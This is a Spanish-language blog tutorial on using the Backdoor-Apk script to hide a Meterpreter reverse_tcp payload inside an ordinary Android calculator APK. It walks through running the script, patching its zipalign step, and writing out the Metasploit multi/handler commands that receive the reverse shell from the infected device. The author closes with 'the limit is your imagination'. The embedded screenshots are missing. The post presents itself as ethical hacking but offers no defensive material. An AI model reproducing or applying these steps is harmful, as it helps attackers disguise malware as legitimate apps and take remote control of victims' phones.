Backdoor-Apk o como agregar un backdoor a un apk en 30 segundos

Backdoor-Apk es un script en bash desarrollado por Dana Jamer que simplifica todo el proceso de agregar un backdoor a cualquier APK de Android. El proceso es bastante sencillo (quizás con alguna complicación a la hora de ejecutarlo por primera vez, ya lo explico en la entrada) pero si tienes conocimientos de Linux, bash, msf y poco más podrás realizarlo sin ningún problema siguiendo este pequeño manual.

 

Vamos a ello…

 

En primer lugar vamos a descargar el script desde Github de esta manera (si quieres puedes descargarlo directamente desde Github en ZIP):

 

1

https://github.com/dana-at-cp/backdoor-apk

 

Antes de empezar yo voy a descargar un APK aparentemente inofensivo, una calculadora para Android

2

 

Con nuestro APK y con el script descargado ya tenemos casi todo listo, abrimos un terminal y ejecutamos los siguiente para iniciar el backdoor-apk

4

 

Podemos elegir varios payloads  para Android, en mi caso he elegido el meterpreter/reverse_tcp pero ya os digo, podéis elegir al gusto de cada uno. Elegimos la opción 3 y continuamos.

Si os fijáis al final el script falla en la última fase (es posible que no te de error, puedes saltarte una buena parte de este post), bien, vamos a arreglar esto.

 

Para ello (si estamos en Kali como yo) deberéis actualizar/añadir los repositorios pertinentes para instalar el paquete zipalign

7

 

Después de esto debemos modificar el archivo del script de forma manual y lo modificáis tal cual aparece en la siguiente imagen en la línea de ZIPALIGN

8

 

Modificado esto reiniciamos todo el proceso comentado anteriormente y comprobamos que finaliza sin ningún problema

 

Ya tenemos nuestro APK con payload incluido!! Fácil, verdad? Bien, nuestro APK se encuentra en la carpeta ‘original/dist’.

10

En mi caso os voy a enseñar en un emulador de Android como el APK se ejecuta sin ningún problema y recibiremos la conexión en nuestro MSF.

El script nos facilita la vida y nos genera un script de recursos para Metasploit llamado backdoor-apk.rc

Con nuestra consola ejecutamos lo siguiente

 

 

Este script nos configurará todos los parámetros para recibir la conexión inversa en la IP y puerto que hemos especificado, esto lo podríamos hacer nosotros manualmente por supuesto, de esta manera:

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.197.129
set LPORT 7777
set ExitOnSession false
exploit -j -z

 

12

 

Una vez iniciado nuestro metasploit vamos a instalar el APK en nuestra maquina virtual de Android y la instalamos para ver que en principio, no es sospechosa.

14

 

El APK parece legitimo no? Revisemos nuestra consola de MSF

 

15

 

Tenemos nuestra sesión de Meterpreter.

A partir de aquí el limite es vuestra imaginación.

 

Nos vemos en la próxima, un saludo.

 

Matías Moreno Cárdenas

Publicado por: Matías Moreno Cárdenas

Analista de Seguridad IT y hacking ético / Desarrollador de Software Multiplataforma. Actualmente director técnico y responsable del departamento de Pentesting en la empresa The Security Sentinel.

Deja un comentario